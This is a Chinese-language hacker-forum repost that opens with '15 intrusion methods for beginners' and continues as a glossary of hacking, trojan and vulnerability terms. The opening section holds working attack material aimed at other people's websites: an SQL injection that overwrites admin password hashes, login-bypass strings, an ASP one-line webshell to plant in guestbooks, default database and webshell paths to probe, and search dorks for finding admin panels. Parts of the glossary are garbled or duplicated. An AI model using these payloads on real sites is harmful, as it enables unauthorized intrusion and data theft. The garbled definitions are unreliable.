骇客基本术语
https://www.360docs.net/doc/4119032453.html,/bbs/thread.php?fid=22本文来源于梅兰网南京站
一:菜鸟入侵的15钟方法
1.上传漏洞[不多讲]
pS: 如果看到:选择你要上传的文件[重新上传]或者出现“请登陆后使用”,80%就有漏洞了!" 有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传. "
2.注入漏洞[不多讲]
pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:
http://注入网址;update admin set password=’新MD5密码’where password=’旧MD5密码’-- [admin为表名.]
"3.旁注,也就是跨站. "
我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们要入侵的站点。,在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了
4.暴库:把二级目录中间的/换成%5c
EY:https://www.360docs.net/doc/4119032453.html,/test/test/test.asp?test=test&;amp;test=1
如果你能看到:’E:\test\test\database\test.asa’不是一个有效的路径。确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。
这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.
5.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。
我收集了一下。类似的还有:
"’or’’=’ "" or ""a""=""a ’) or (’a’=’a "") or (""a""=""a or 1=1-- ’ or ’a’=’a "
6.社会工程学。这个我们都知道吧。就是猜解。
7.写入ASP格式数据库。
"就是一句话木马[<%execute request(""value"")%> ],常用在留言本. "
EY:https://www.360docs.net/doc/4119032453.html,/book/book.asp[这个就是ASP格式的数据库],再写入一句话木马
8.源码利用:一些网站用的都是网上下载的源码.有的站长很菜.什么也不改.
EY:https://www.360docs.net/doc/4119032453.html,/xiaoyoulu/index.asp
这个站用的是:杰出校友录,源码我下过了,
默认数据库/webshell路径:\database\liangu_data.mdb 后台管理:adm_login.asp 密码及用户名都是admin
9.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具:网站猎手挖掘鸡
EY:https://www.360docs.net/doc/4119032453.html,/bbs/Databackup/dvbbs7.MDB
10.查看目录法:人一些网站可以断开目录,可以方问目录。
EY:https://www.360docs.net/doc/4119032453.html,/shop/admin/https://www.360docs.net/doc/4119032453.html,/babyfox/admin/%23bb%23dedsed2s/ 这样我们可以找到数据库,下载不用我教吧
11.工具溢出:
.asp?NewsID= /2j.asp?id=18 .asp?id=[这种方法可以取得大量的WEBSHELL]
12.搜索引擎利用:
(1).inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/
(2).找网站的管理后台地址:
site:https://www.360docs.net/doc/4119032453.html,intext:管理
site:https://www.360docs.net/doc/4119032453.html,intitle:管理<关键字很多,自已找>
site:https://www.360docs.net/doc/4119032453.html,inurl:login
"(3).查找access的数据库,mssql、mysql的连接文件"
allinurl:bbsdata
filetype:mdbinurl:database
filetype:incconn
inurl:datafiletype:mdb
我主不做了。。自已做做吧。。
13.COOKIE诈骗:
把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。这个我就不多讲了
14.利用常见的漏洞:
如动网BBS
可以先用:dvbbs权限提升工具,使自已成为前台管理员。
THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert取得Cookies/NC包
这个我就不做了,网上教程多的是,自已下个看看。
工具:dvbbs权限提升工具动网固顶贴工具
15.还有一些老漏洞。
如IIS3,4的查看源码,5的DELETE
CGI,PHP的一些老洞,我就不说了啊。。太老了。没有什么大用途。
二:黑客术语之系统篇
肉鸡
肉鸡就是具有最高管理权限的远程电脑。简单的说就是受你控制的远程电脑。肉鸡可以是win、Unix/Linux……等各种系统;肉鸡可以是一家公司的服务器,一家网站的服务器,甚
至是美国白宫或军方的电脑,只要你有这本事入侵并控制他,要登陆肉鸡,必须知道3个参数:远程电脑的IP、用户名、密码。
3389、4899肉鸡
3389是Windows终端服务(Terminal Services)所默认使用的端口号,该服务是微软为了方便网络管理员远程管理及维护服务器而推出的,网络管理员可以使用远程桌面连接到网络上任意一台开启了终端服务的计算机上,成功登陆后就会象操作自己的电脑一样来操作主机了。这和远程控制软件甚至是木马程序实现的功能很相似,终端服务的连接非常稳定,而且任何杀毒软件都不会查杀,所以也深受黑客喜爱。黑客在入侵了一台主机后,通常都会想办法先添加一个属于自己的后门帐号,然后再开启对方的终端服务,这样,自己就随时可以使用终端服务来控制对方了,这样的主机,通常就会被叫做3389肉鸡。Radmin是一款非常优秀的远程控制软件,4899就是Radmin默认使以也经常被黑客当作木马来使用(正是这个原因,目前的杀毒软件也对Radmin查杀了)。有的人在使用的服务端口号。因为Radmin 的控制功能非常强大,传输速度也比大多数木马快,而且又不被杀毒软件所查杀,所用Radmin管理远程电脑时使用的是空口令或者是弱口令,黑客就可以使用一些软件扫描网络上存在Radmin空口令或者弱口令的主机,然后就可以登陆上去远程控制对恶劣,这样被控制的主机通常就被成做4899肉鸡。
跳板
一个具有辅助作用的机器,利用这个主机作为一个间接的工具,来入侵其他的主机,一般和肉鸡连用。
注入
随着B/S模式应用开发的发展,使用这种模式编写程序的程序员越来越来越多,但是由于程序员的水平参差不齐相当大一部分应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想要知的数据,这个就是所谓的SQLinjection,即:SQL注意入。
注入点
是可以实行注入的地方,通常是一个访问数据库的连接。根据注入点数据库的运行帐号的权限的不同,你所得到的权限也不同。
溢出
确切的讲,应该是“缓冲区溢出”。简单的解释就是程序对接受的输入数据没有执行有效的检测而导致错误,后果可能是造成程序崩溃或者是执行攻击者的命令。大致可以分为两类:(1)堆溢出;(2)栈溢出。
默认共享
"默认共享是WINDOWS2000/XP/2003系统开启共享服务时自动开启所有硬盘的共享,因为
加了""$""符号,所以看不到共享的托手图表,也成为隐藏共享。"
端口
(Port)相当于一种数据的传输通道。用于接受某些数据,然后传输给相应的服务,而电脑将这些数据处理后,再将相应的恢复通过开启的端口传给对方。一般每一个端口的开放的偶对应了相应的服务,要关闭这些端口只需要将对应的服务关闭就可以了。
shell
shell就是系统于用户的交换式界面。简单来说,就是系统与用户的一个沟通环境,我们平时用到的DOS就是一个shell。(Win2K是cmd.exe)shell是一种操作系统用户交互界面的Unix工具,它是理解和执行用户输入的命令的程序层。在一些系统中,shell称为命令解析器。shell通常指命令语法界面(想象DOS操作系统及其“C:>”提示符以及“dir”、“edit”等用户命令)。
root
"Unix里最高权限的用户,也就是超级管理员。"
rootkit
rootkit是攻击者用来隐藏自己的行踪和保留root(根权限,可以理解成WINDOWS下的system或者管理员权限)访问权限的工具。通常,攻击者通过远程攻击的方式获得root访问权限,或者是先使用密码猜解(破解)的方式获得对系统的普通访问权限,进入系统后,再通过,对方系统内存在的安全漏洞获得系统的root权限。然后,攻击者就会在对方的系统中安装rootkit,以达到自己长久控制对方的目的,rootkit与我们前边提到的木马和后门很类似,但远比它们要隐蔽,黑客守卫者就是很典型的rootkit,还有国内的ntroorkit等都是不错的rootkit工具。
admin
"windows NT,2K,XP里最高权限的用户,也就是超级管理员。"
rootshell
通过一个溢出程序,在主机溢出一个具有root权限的shell。
exploit
溢出程序。exploit里通常包含一些shellcode。
shellcode
溢出攻击要调用的API函数,溢出后要有一个交换式界面进行操作。所以说就有了shellcode。
API(Application Programming Interface)应用程序编程接口
是操作系统为程序开发人员提供的一组函数库,开发人员可以通过调用API简易的实现一些操作系统已经提供的功能。(下面有API的详细解释)
Acces Control list(ACL)
访问控制列表。
Address Resolution Protocol(ARP)
地址解析协议。
Administrator account
管理员帐号。
ARPANET
阿帕网(Internet的简称)。
access token
访问令牌。
adaptive speed leveling
自适应速度等级调整。
algorithm
算法alias别名。
anlpasswd
一种与PASSWD+相似的代理密码检查器。
applicatlons
应用程序异步传递模式。
accout lockout
帐号封锁。
accout policies
记帐策略。
accounts
帐号。
adapter
适配器。
IPC$
是共享“命名管道”的资源,它是为了让进程间通信而开放的饿命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
什么是API(Application Programming Interface)
首先,有必要向大家讲一讲,什么是API。所谓API本来是为C和C++程序员写的。API 说来说去,就是一种函数,他们包含在一个附加名为DLL的动态连接库文件中。用标准的定义来讲,API就是Windows的32位应用程序编程接口,是一系列很复杂的函数,消息和结构,它使编程人员可以用不同类型的编程语言编制出的运行在Windows95和Windows NT 操作系统上的应用程序。可以说,如果你曾经学过VC,那么API对你来说不是什么问题。但是如果你没有学过VC,或者你对Windows95的结构体系不熟悉,那么可以说,学习API 将是一件很辛苦的事情。
如果你打开WINDOWS的SYSTEM文件夹,你可以发现其中有很多附加名为DLL的文件。一个DLL中包含的API函数并不只是一个,数十个,甚至是数百个。我们能都掌握它嘛?回答是否定的∶不可能掌握。但实际上,我们真的没必要都掌握,只要重点掌握Windos系统本身自带的API函数就可以了。但,在其中还应当抛开掉同VB本身自有的函数重复的函数。如,VB
的etAttr命令可以获得文件属性,SetAttr可以设置文件属性。对API来讲也有对应的函数
GetFileAttributes和SetFileAttributes,性能都差不多。如此地一算,剩下来的也就5、600个。
是的,也不少。但,我可以敢跟你说,只要你熟悉地掌握100个,那么你的编程水平比现在高出至少要两倍。尽管人们说VB和WINDOWS具有密切的关系,但我认为,API更接近
WINDOWS。如果你学会了API,首要的收获便是对WINDOWS体系结构的认识。这个收获是来自不易的。
如果你不依靠API会怎么样?我可以跟你说,绝大多是高级编程书本(当然这不是书的名程叫高级而高级的,而是在一开始的《本书内容》中指明《本书的阅读对象是具有一定VB基础的读者》的那些书),首先提的问题一般大都是从API开始。因此可以说,你不学API,你大概将停留在初级水平,无法往上攀登。唯一的途径也许就是向别人求救∶我快死了,快来救救我呀,这个怎么办,那个怎么办?烦不烦呢?当然,现在网上好人太多(包括我在内,嘻嘻),但,你应当明白,通过此途径,你的手中出不了好的作品。这是因为缺乏这些知识你的脑子里根本行不成一种总体的设计构思。
【WAP攻击】
黑客们在网络上疯狂肆虐之后,又将“触角”伸向了W AP(无线应用协议的英文简写),继而WAP成为了他们的又一个攻击目标。“W AP攻击”主要是指攻击W AP服务器,使启用了W AP服务的手机无法接收正常信息。由于目前W AP无线网络的安全机制并非相当严密,因而这一领域将受到越来越多黑客的“染指”。现在,我们使用的手机绝大部分都已支持WAP上网,而手机的W AP功能则需要专门的WAP服务器来支持,若是黑客们发现了W AP 服务器的安全漏洞,就可以编制出针对该WAP服务器的病毒,并对其进行攻击,从而影响到W AP服务器的正常工作,使W AP手机无法接收到正常的网络信息。
【ICMP协议】
ICMP(全称是Internet Control Message Protocol,即Internet控制消息协议)用于在IP主机、路由器之间传递控制消息,包括网络通不通、主机是否可达、路由是否可用等网络本身的消息。例如,我们在检测网络通不通时常会使用Ping命令,Ping执行操作的过程就是ICMP 协议工作的过程。“ICMP协议”对于网络安全有着极其重要的意义,其本身的特性决定了它非常容易被用于攻击网络上的路由器和主机。例如,曾经轰动一时的海信主页被黑事件就是以ICMP攻击为主的。由于操作系统规定ICMP数据包最大尺寸不超过64KB,因而如果向目标主机发送超过64KB上限的数据包,该主机就会出现内存分配错误,进而导致系统耗费大量的资源处理,疲于奔命,最终瘫痪、死机。
【时间戳】
“时间戳”是个听起来有些玄乎但实际上相当通俗易懂的名词,我们查看系统中的文件属性,其中显示的创建、修改、访问时间就是该文件的时间戳。对于大多数一般用户而言,通过修改“时间戳”也许只是为了方便管理文件等原因而掩饰文件操作记录。但对于应用数字时间戳技术的用户就并非这么“简单”了,这里的“时间戳”(time-stamp)是一个经加密后形成的凭证文档,是数字签名技术的一种变种应用。在电子商务交易文件中,利用数字时间戳服
务(DTS:digita1 time stamp service)能够对提供电子文件的日期和时间信息进行安全保护,以防止被商业对手等有不良企图的人伪造和篡改的关键性内容。
【MySQL数据库】
我们在黑客文章中常会看到针对“MySQL数据库”的攻击,但很多朋友却对其不大了解。“MySQL数据库”之所以应用范围如此广泛,是由于它是一款免费的开放源代码的多用户、多线程的跨平台关系型数据库系统,也可称得上是目前运行速度最快的SQL语言数据库。“MySQL数据库”提供了面向C、C++、Java等编程语言的编程接口,尤其是它与PHP的组合更是黄金搭档。“MySQL数据库”采用的是客户机/服务器结构的形式,它由一个服务器守护程序Mysqld和很多不同的客户程序和库组成。但若是配置不当,“MySQL数据库”就可能会受到攻击,例如若是设置本地用户拥有对库文件读权限,那么入侵者只要获取“MySQL数据库”的目录,将其复制本机数据目录下就能访问进而窃取数据库内容。【MD5验证】
MD5(全称是message-digest algorithm 5)的作用是让大容量信息在用数字签名软件签署私人密匙前被“压缩”为一种保密的格式。它的典型应用是对一段信息(message)产生信息摘要(message-digest),以防止被篡改。通俗地说MD5码就是个验证码,就像我们的个人身份证一样,每个人的都是不一样的。MD5码是每个文件的唯一校验码(MD5不区分大小写,但由于MD5码有128位之多,所以任意信息之间具有相同MD5码的可能性非常之低,通常被认为是不可能的),凭借此特性常被用于密码的加密存储、数字签名及文件完整性验证等功能。通过MD5验证即可出检查文件的正确性,例如可以校验下载文件中是否被捆绑有其它第三方软件或木马、后门(若是校验结果不正确就说明原文件已被人擅自篡改)。
Webshell是什么?这是很多朋友在疑惑的问题,
什么是webshell?今天我们就讲讲这个话题!
webshell是web入侵的脚本攻击工具。
简单的说来,ebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做是一种网页后门。黑客在入侵了一个网站后,通常会将这些asp或php 后门文件与网站服务器WEB目录下正常的网页文件混在一起,好后就可以使用浏览器来访问这些asp 或者php后门,得到一个命令执行环境,以达到控制网站服务器的控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等。可以上传下载文件,查看数据库,执行任意程序命令等。国内常用的WebShell有海阳ASP木马,Phpspy,c99shell等
为了更好理解webshell我们学习两个概念:
什么是“木马”?“木马”全称是“特洛伊木马(Trojan
Horse)”,原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市的故事。在Internet上,“特洛伊木马”指一些程序
设计人员在其可从网络上下载(Download)的应用程序或游戏中,包含了可以控制用户的计算机系统的程序,可能造成用户的系统被破坏甚至瘫痪。
什么是后门?大家都知道,一台计算机上有65535个端口,那么如果把计算机看作是一间屋子,那么这65535个端口就可以它看做是计算机为了与外界连接所开的65535 扇门。每个门的背后都是一个服务。有的门是主人特地打开迎接客人的(提供服务),有的门是主人为了出去访问客人而开设的(访问远程服务)——理论上,剩下的其他门都该是关闭着的,但偏偏由于各种原因,很多门都是开启的。于是就有好事者进入,主人的隐私被刺探,生活被打扰,甚至屋里的东西也被搞得一片狼迹。这扇悄然被开启的门——就是“后门”。
webshell的优点
webshell 最大的优点就是可以穿越防火墙,由于与被控制的服务器或远程主机交换的数据都是通过80端口传递的,因此不会被防火墙拦截。并且使用webshell一般不会在系统日志中留下记录,只会在网站的web日志中留下一些数据提交记录,没有经验的管理员是很难看出入侵痕迹的。
如何寻找webshel:
1,脚本攻击SQL注入
2,使用注入工具
"3,在浏览器里打开百度,输入搜索关键词""在本页操作不需要FSO支持&""或者""一次只能执行一个操作"",然后点击搜索,很快就可以看到检索到了大量的查询结果.
其他的东西,暂时不多说了,以后再深入吧,每天准备一个话题,需要的是巨大的毅力和努力,我们举办的每日讲座就是为了通俗容易懂的普及信息安全知识,让不喜欢看文章,觉得信息安全知识很深奥枯燥的人都明白,其实他只要花很少时间,就可以了解很多信息安全知识!"
NTLM验证
NTML(NT LAN Manager)是微软公司开发的一种身份验证机制,从NT4开始就一直使用,主要用于本地的帐户管理。
IPC管道
为了更好地控制和处理不同进程之间的通信和数据交换,系统会通过一个特殊的连接管道来调度各个进程
三:黑客术语之木马篇
木马
全称为特洛伊木马(Trojan Horse)。“特洛伊木马”这一词最早出现在希腊神话传说中。相传在3000年前,在一次希腊战争中。麦尼劳斯派兵讨伐特洛伊王国,但久攻不下。他们想出一个主意,首先他们假装被打败然后留下一个大木马,。而木马里面却藏着最强悍的勇士!最后等时间一到木马里的勇士冲出来把敌人打败了。这就是后来的“木马计”,而黑核中的木马有点后门的意思,就是把预谋的功能隐藏在公开的功能里,掩饰真正的企图。传统的木马包括客户端(Client)和服务端(Server)两个程序,客户端是用于远程控制目标机器,服务端即真实的木马,和神话中的那个木马一样的性质:隐藏在目标机器中,充当卧底,一旦客户端向其发出命令,服务端便起着内应的作用,接受客户端的命令并在目标机器上作出相应的反应。因为它容易上手、功能强大,不用强记硬背那些复杂的命令,任何接触电脑的人都能使用,所以当今的木马的危害大于病毒。
1.远程控制木马
远程控制木马是数量最多,危害最大,同时知名度也最高的一种木马,它可以让攻击者完全控制被感染的计算机,攻击者可以利用它完成一些甚至连计算机主人本身都不能顺利进行的操作,其危害之大实在不容小觑。由于要达到远程控制的目的,所以,该种类的木马往往集成了其他种类木马的功能。使其在被感染的机器上为所欲为,可以任意访问文件,得到机主的私人信息甚至包括信用卡,银行账号等至关重要的信息。
大名鼎鼎的木马冰河就是一个远程访问型特洛伊木马。这类木马用起来是非常简单的。只需有人运行服务端并且得到了受害人的IP。就会访问到他/她的电脑。他们能在你的机器上干任何事。远程访问型木马的普遍特征是:键盘记录,上传和下载功能,注册表操作,限制系统功能……等。远程访问型特洛伊木马会在你的电脑上打开一个端口以保持连接。
2.密码发送木马
在信息安全日益重要的今天。密码无疑是通向重要信息的一把极其有用的钥匙,只要掌握了对方的密码,从很大程度上说。就可以无所顾忌地得到对方的很多信息。而密码发送型的木马正是专门为了盗取被感染计算机上的密码而编写的,木马一旦被执行,就会自动搜索内存,Cache,临时文件夹以及各种敏感密码文件,一旦搜索到有用的密码,木马就会利用免费的电子邮件服务将密码发送到指定的邮箱。从而达到获取密码的目的,所以这类木马大多使用25号端口发送E-mail。大多数这类的特洛伊木马不会在每次Windows重启时重启。这种特洛伊木马的目的是找到所有的隐藏密码并且在受害者不知道的情况下把它们发送到指定的信箱,如果体育隐藏密码,这些特洛伊木马是危险的。
由于我们需要获得的密码多种多样,存放形式也大不相同,所以,很多时候我们需要自己编写程序,从而得到符合自己要求的木马。
3.键盘记录木马
这种特洛伊木马是非常简单的。它们只做一件事情,就是记录受害者的键盘敲击并且在LOG
文件里查找密码。据笔者经验,这种特洛伊木马随着Windows的启动而启动。它们有在线和离线记录这样的选项,顾名思义,它们分别记录你在线和离线状态下敲击键盘时的按键情况。也就是说你按过什么按键,下木马的人都知道,从这些按键中他很容易就会得到你的密码等有用信息,甚至是你的信用卡账号哦!当然,对于这种类型的木马,邮件发送功能也是必不可少的。
4.破坏性质的木马
这种木马惟一的功能就是破坏被感染计算机的文件系统,使其遭受系统崩溃或者重要数据丢失的巨大损失。从这一点上来说,它和病毒很相像。不过,一般来说,这种木马的激活是由攻击者控制的,并且传播能力也比病毒逊色很多。
5.DoS攻击木马
随着DoS攻击越来越广泛的应用,被用作DoS攻击的木马也越来越流行起来。当你入侵了一台机器,给他种上DoS攻击木马,那么日后这台计算机就成为你DoS攻击的最得力助手了。你控制的肉鸡数量越多,你发动DoS攻击取得成功的机率就越大。所以,这种木马的危害不是体现在被感染计算机上,而是体现在攻击者可以利用它来攻击一台又一台计算机,给网络造成很大的伤害和带来损失。
还有一种类似DoS的木马叫做邮件炸弹木马,一旦机器被感染,木马就会随机生成各种各样主题的信件,对特定的邮箱不停地发送邮件,一直到对方瘫痪、不能接受邮件为止。
6.代理木马
"黑客在入侵的同时掩盖自己的足迹,谨防别人发现自己的身份是非常重要的,因此,给被控制的肉鸡种上代理木马,让其变成攻击者发动攻击的跳板就是代理木马最重要的任务。通过代理木马,攻击者可以在匿名的情况下使用Telnet,ICQ,IRC等程序,从而隐蔽自己的踪迹。"
7.FTP木马
这种木马可能是最简单和古老的木马了,它的惟一功能就是打开21端口,等待用户连接。现在新FTP木马还加上了密码功能,这样,只有攻击者本人才知道正确的密码,从而进人对方计算机。
8.程序杀手木马
"上面的木马功能虽然形形色色,不过到了对方机器上要发挥自己的作用,还要过防木马软件这一关才行。常见的防木马软件有ZoneAlarm,Norton Anti-Virus等。程序杀手木马的功能
就是关闭对方机器上运行的这类程序,让其他的木马更好地发挥作用。在http:/www.snake-basket.de/e/A V.txt这个地址,你能找到现在流行使用的绝大多数防病毒和防木马软件的名称、介绍以及结束它们的方法。"
9.反弹端口型木马
木马是木马开发者在分析了防火墙的特性后发现:防火墙对于连入的链接往往会进行非常严格的过滤,但是对于连出的链接却疏于防范。于是,与一般的木马相反,反弹端口型木马的服务端(被控制端)使用主动端口,客户端(控制端)使用被动端口。木马定时监测控制端的存在,发现控制端上线立即弹出端口主动连结控制端打开的主动端口;为了隐蔽起见,控制端的被动端口一般开在80,这样,即使用户使用端口扫描软件检查自己的端口,发现的也是类似TCP UserIP:1026 ControllerIP:80ESTABLISHED的情况,稍微疏忽一点,你就会以为是自己在浏览网页(防火墙也会这么认为,我想大概没有哪个防火墙会不让用户向外连接80端口吧)。
看到这里,有人会问:那服务端怎么能知道控制端的IP地址呢?难道控制端只能使用固定的IP地址?一查就查到了。实际上,这种反弹端口的木马常常会采用固定IP的第三方存储设备来进行IP地址的传递。举一个简单的例子:事先约定好一个个人主页的空间,在其中放置一个文本文件,木马每分钟去GET一次这个文件,如果文件内容为空,就什么都不做,如果有内容,就按照文本文件中的数据计算出控制端的IP和端口,反弹一个TCP链接回去,这样,每次控制者上线只需要FTP一个INI文件,就可以告诉木马自己的位置。为了保险起见。这个IP地址甚至可以经过一定的加密,除了服务和控制端。其他的人就算拿到了也没有任何意义。对于一些能够分析报文、过滤TCP/UDP的防火墙,反弹端口型木马同样有办法对付。简单来说。控制端使用80端口的木马完全可以真的使用HTTP协议,将传送的数据包含在HTTP的报文中,难道防火墙真的精明到可以分辨通过HTTP协议传送的究竟是网页,还是控制命令和数据。
10.网页木马
表面上伪装成普通的网页文件或是将而已的代码直接插入到正常的网页文件中,当有人访问时,网页木马就会利用对方系统或者浏览器的漏洞自动将配置好的木马的服务端下载到访问者的电脑上来自动执行。
11.挂马
就是在别人的网站文件里面放入网页木马或者是将代码潜入到对方正常的网页文件里,以使浏览者中马。
12.后门
这是一种形象的比喻,入侵者在利用某些方法成功的控制了目标主机后,可以在对方的系统中植入特定的程序,或者是修改某些设置。这些改动表面上是很难被察觉的,但是入侵者却可以使用相应的程序或者方法来轻易的与这台电脑建立连接,重新控制这台电脑,就好象
是入侵者偷偷的配了一把主人房间的要是,可以随时进出而不被主人发现一样。
通常大多数的特洛伊木马(Trojan Horse)程序都可以被入侵者用语制作后门(BackDoor)
四:黑客术语之漏洞篇
Unicode漏洞
Unicode漏洞是一个16位的字符集,它可以移植到所有主要的计算机平台并且覆盖几乎整个世界。微软IIS4。0和5。0都存在利用扩展Unicode字符取代“/”和“╲”而能利用“。。/”目录遍历的漏洞。未经授权的用户可能利用IUSR_machinename帐号的上下文空间访问任何以知的文件。该帐号在默认的情况下属于Every-one和Users组的成员,因此任何与Web根目录在同一逻辑驱动器上的能被这些用户组访问文件都能被删除,修改或执行,就如同一个用户成功登陆所能完成的一样。
CGI漏洞
CGI是Common Gateway Interface(公用网关接口)的简称,并不特指一种语言。Web服务器的安全问题包括,一是Web服务器软件编制中的BUG;二是服务器配置错误。这可能导致CGI源代码泄露,物理路径信息泄露,系统敏感信息泄露或远程执行任意指令。CGI语言漏洞分为以下几种;配置错误,边界条件错误,访问验证错误,策略错误,使用错误等等。
IIS漏洞
"IIS的英文全称是Internet Information Service, 是微软公司的Web服务器。IIS支持多种需要服务器处理的文件类型,当一个web用户从客户端请求此类文件时,相应的DLL文件将自动对其进行处理。然而在ISM.DLL这个负责处理HTR文件的文件中被发现存在严重的安全漏洞。它可能对WEB服务器的安全造成威胁。"
IPC$漏洞
IPC$是共享‘命名管道’的资源,他对于程序间的通讯很重要。在远程管理计算机和查看计算机的共享资源时使用。利用IPC我们可以与目标主机建立一个空的连接,而利用这个空的连接,我们还可以得到目标主机上的用户列表。但是,一些别有用心者会利用IPC$,查找我们的用户列表,并使用一些字典工具,对我们的主机进行攻击。
SSL漏洞
SSL的英文全称是Secure socket layer,是网上传输信用卡和帐户密码等信息时广泛采用的行业加密标准。
3389漏洞
由于微软在中国的输入法原因,使得安装了微软终端服务和全拼的Win2k服务器存在着远程登陆并能获得超级用户权限的严重漏洞。
弱口令攻击
一些网站的管理员帐号密码,FTP密码,SQL密码等使用非常简单的或容易猜测到的字母或数字,比如123,abc,等。利用现有的家用的计算机配合破解软件足可以在短暂时间内轻松破解,一旦破解,主机便意味着被破解。
五:其他黑客术语
窃听
窃听或搭线窃听,仅是指对私人通话的窃听。在IT世界中就安全而言,它的范围涵盖了远程窃听和记录,包括对电话通话、传真通信、电子邮件和数据传输等的截取和数据骗取,甚至还包括对无线通信的无线信号进行扫描。
ECB
电子代码本(ECB)是密文块的一种运作模式,其特色是每一种可能出现的纯文本信息都会有固定的密文与之相对,且反之亦然。换言之,相同的纯文本信息总是被加密成相同的密文信息。
Echelon
是一个未被官方承认的美国引导全球的间谍网络,其中运行着一个对电子通讯进行截取和中继的自动化系统。据说,每日所监控的通讯多达30亿条,包括全球公共和私人组织以及市民的所有电话通话、电子邮件消息、传真、卫星通讯和Internet下载。
响应应答
响应应答是接收到响应询问的计算机通过ICMP发出的响应。
响应询问
响应询问是一条发送给某台计算机的ICMP消息,用于确定其是否在线和向它发送信息时,信息到达所需的时间。
EFS
加密文件系统(EFS)是Windows2000操作系统中的一种功能,可支持任何文件或文件夹以加密的形式进行储存,而且只能由个别用户和经授权的密码恢复代理才可以解密。EFS对于移动计算机用户来说,尤为重要,因为他们的计算机(以及文件)很可能遭受盗窃;另外对于储存敏感性很高的数据来说,EFS 也是特别重要的。外行信息过滤
对向外输送的数据进行过滤。
电子嬉皮士集体
电子嬉皮士集体是一种由黑客形动主义者组成的国际性组织,总部设在英格兰的牛津郡,他们的目的是利用国际互联网作为通讯和宣传的工具来宣泄自己的思想。电子嬉皮士集体进行抗议所采取的普通方式是网络静坐示威。
电子源码书
电子源码书(ECB)是密码块操作的一种模式,其主要特点为每一种可能存在的纯文本内容都拥有固定的密文与之相对应,而且反之亦然。换言之,相同的纯文本内容总会被转化成相同的密文。
Elk Cloner
Elk Cloner是据今为止为人所知的最早(1982)在世界范围内进行传播的计算机病毒。
椭圆曲线加密法
椭圆曲线加密法(ECC)是一种公钥加密技术,以椭圆曲线理论为基础,在创建密钥时可做到更快、更小,并且更有效。ECC利用椭圆曲线等式的性质来产生密钥,而不是采用传统的方法利用大质数的积来产生。
电子邮件攻击
电子邮件攻击的常用方式是垃圾邮件攻击,包括钓鱼攻击。每天,全世界范围内数十亿封发出的电子邮件中,至少有三分之一是不请自来的,也就是垃圾邮件。而色情垃圾邮件达到所有垃圾邮件总数的25%以上。
电子邮件伪造
电子邮件伪造是指对电子邮件的信息头进行修改,以使该信息看起来好象来自其真实源地址之外的其它地址。垃圾邮件的传播者通常使用哄骗的方式来达到诱使接收者打开电子邮件,甚至可能对他们的请求进行回复。
电子邮件欺骗
电子邮件欺骗是指对电子邮件的信息头进行修改,以使该信息看起来好象来自其真实源地址之外的其它地址。垃圾邮件的传播者通常使用哄骗的方式来达到诱使接收者打开电子邮件,甚至可能对他们的请求进行回复。
辐射监控
辐射监控是指对电子设备的电辐射或电磁辐射进行监控,这些电子设备包括芯片、监视器、打印机和所有通过空气或导体(如电缆或水管)散发辐射的电子设备。“风暴”是美国政府设立的秘密项目,其宗旨就是研究一些计算机和远程通讯设备所散布的电磁辐射(EMR)导致信息被窃取的可能性。
辐射分析
对过对某系统中所发出信号的监控和分析而直接获得通讯数据,而该系统中尽管包括了这些数据,但并未打算将这些数据散布出去。
封装
在其它的数据结构中包含某种数据结构,以使被包含的数据结构暂时得以隐藏。
解密文件系统
解密文件系统(EFS)是Windows2000操作系统中的一种功能,它支持任何文件或文件夹以一种加密的形式进行储存而解密只能由某个个人用户或经授权的恢复代理人执行。EFS对移动计算机用户来说尤为重要,他们的计算机(和文件)很可能遭受物理性的偷窃,并且在这些计算机中储存着高敏感性的数据。
加密
纯文本数据变换成密文的密码转换过程,可以隐藏起数据本来的意思,以防止被别人了解或使用。
临时端口
也叫做暂时端口。通常存在于客户机中。它在客户端应用程序需要连接到服务器时建立而在客户端应用程序终止时取消。它的端口号是随机选取的,数值大于1023。
第三方密钥
第三方密钥涉及到向可信赖的第三方(TTP)寄存密钥。由于政府部门不断的努力和期望,并且对大众的要求不仅仅局限于由第三方保密密钥,还包括将密钥向执法机构进行公开,因此说,这是一种涉及到情感的项目。这提高了公民的发布自由和安全性。
第三方保管的密码
第三方保管的密码是写下来并保存在安全处所的密码,在紧急情况中,如果授权人员无法联系时,处理紧急情况的人员可以使用由第三方保管的密码。
第三方加密标准
第三方加密标准(EES)是一种对通信加密的标准,1994年获得美国商业部的批准,更为人知的应用名称是快船芯片。EES的显注特征是所谓的第三方密钥保管,在特定的情况中它支持经授权的政府机构进行窃听形动。电子签名
电子签名也叫做数字签名,是一种电子化的签名,可用于验证消息发送者或文件署名人的身份,并可以保证所发送的消息或文档未被更改。
正面的黑客
正面的黑客是计算机或网络的专家,它们代表安全系统的拥有者对该系统进行攻击,找出恶意黑客可以利用的漏洞。在对安全系统进行测试时,正面黑客采用的方法同真正的黑客所采用方法一模一样,但它们不会利用这些漏洞,而是向其拥有者进行报告。
正面的黑客形动
正面的黑客形动也叫做渗透测试,侵入测试或红色防线。是由正面的黑客所展开的寻找系统中可能存在问题的形动。
正面蠕虫
